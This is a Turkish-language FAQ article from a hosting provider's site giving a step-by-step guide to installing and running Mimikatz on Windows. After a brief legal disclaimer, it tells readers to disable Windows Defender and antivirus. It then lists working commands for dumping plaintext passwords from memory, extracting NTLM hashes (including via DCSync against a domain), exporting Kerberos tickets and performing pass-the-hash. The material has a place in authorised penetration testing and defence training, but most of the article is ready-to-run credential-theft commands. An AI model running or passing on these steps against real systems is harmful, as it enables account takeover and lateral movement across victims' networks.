Destek Bileti Açın
7/24 müşteri desteği
Destek Bileti Açın AVAHOST uzmanımızla sohbet edin
Turkish Flag Türkçe
Giriş
info@ava-host.com
Kaydolun Giriş

Ana Sayfa » FAQ » Windows OS’te Mimikatz Nasıl Kurulur ve Kullanılır

Windows OS’te Mimikatz Nasıl Kurulur ve Kullanılır

Popular:
SUNUCU KURULUMUNUZU GELİŞTİRİN! AVA UYGULA VE BİRİNCİYİ BAŞLAT %15 İNDİRİM
PROMOSYON KODUNU KULLANIN:
Mart 7, 2025 13:41 3 min

Giriş

Mimikatz, bellekten düz metin şifreler, hash’ler, PIN kodları ve Kerberos biletleri çıkarmak için tasarlanmış güçlü bir post-exploitation aracıdır. Sistem güvenlik açıklarını değerlendirmek için penetrasyon test uzmanları ve güvenlik profesyonelleri tarafından yaygın olarak kullanılmaktadır. Bu kılavuz, etik güvenlik testleri için Mimikatz’ı kurma ve kullanma konusunda adım adım bir yaklaşım sunmaktadır.

Uyarı: Mimikatz’ın yetkisiz kullanımı yasadışıdır. Herhangi bir ortamda kullanmadan önce izin aldığınızdan emin olun.

Ön Koşullar

Mimikatz’ı kurmadan önce, aşağıdakilere sahip olduğunuzdan emin olun:

  • Bir Windows makinesi (Windows 7, 10, 11 veya Sunucu sürümleri)
  • Yönetici ayrıcalıkları
  • Windows Defender ve herhangi bir antivirüs yazılımı devre dışı (Mimikatz genellikle kötü amaçlı yazılım olarak işaretlenir)

Mimikatz İndirme

Mimikatz, GitHub’da bulunan açık kaynaklı bir araçtır. İndirmek için:

  1. Bir web tarayıcısı açın ve https://github.com/gentilkiwi/mimikatz adresine gidin.
  2. Kod > ZIP İndir seçeneğine tıklayın.
  3. ZIP dosyasını istediğiniz bir klasöre çıkarın.

Alternatif olarak, Git kullanarak depoyu klonlayabilirsiniz:

 git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatz’ı Çalıştırma

Mimikatz yönetici ayrıcalıkları gerektirdiğinden, çalıştırmak için bu adımları izleyin:

  1. Komut İstemi veya PowerShelli Yönetici olarak açın.
  2. Mimikatz’ı çıkardığınız klasöre gidin:
    cd pathtomimikatzx64
  3. Mimikatz’ı çalıştırın:
    mimikatz.exe
  4. mimikatz #

    istemi ile bir komut satırı arayüzü görmelisiniz.

Temel Mimikatz Komutları

1. Sistem Ayrıcalıklarını Kontrol Etme

Kimlik bilgilerini çıkarmadan önce yeterli ayrıcalıklara sahip olduğunuzu doğrulayın:

privilege::debug

Başarılı olursa, şunu görmelisiniz:

Privilege '20' OK

2. Bellekten Şifreleri Çıkarma

Bellekten düz metin şifreleri dökmek için:

sekurlsa::logonpasswords

Bu, mevcutsa kullanıcı adı, alan ve şifreleri düz metin olarak gösterecektir.

3. NTLM Hash’lerini Dökme

NTLM hash’leri pass-the-hash saldırıları için kullanılabilir. Bunları çıkarmak için çalıştırın:

lsadump::sam

Veya, uzaktan sistemler için:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Kerberos Bileti Çıkarma

Sistemden Kerberos biletlerini almak için:

sekurlsa::tickets /export

Bu, pass-the-ticket saldırılarında kullanılabilecek

.kirbi

dosyalarını dışa aktarır.

5. Pass-the-Hash Saldırısı

Bir şifre yerine NTLM hash’i ile kimlik doğrulamak için:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

İlgili Yazılar

” güvenli bağlantı sağlayamıyor” hatasını nasıl düzeltirsiniz

Tarayıcınızda “Güvenli Bağlantı Sağlanamıyor” hatasıyla karşılaşmak sinir bozucu olabilir, özellikle de önemli web sitelerine erişmeye çalışırken. Bu hata genellikle web...

Mar 24, 20254 min

2024’te Linux’u Etkilemesi Beklenen Güncellemeler ve Gelişmeler

Kernel iyileştirmeleri Belki de vurgulanması gereken en önemli güncelleme kernel güncellemesidir. Linux kernel, işletim sisteminin çekirdeğini oluşturur ve performans, güvenlik...

Mar 18, 20245 min

Windows 10’da Hosts Dosyanızı Nasıl Düzenlersiniz

hosts dosyası Windows 10 dedicated servers içinde, ana bilgisayar adlarını IP adreslerine eşlemek için kullanılan düz metin dosyasıdır; belirli alanlar...

May 5, 20253 min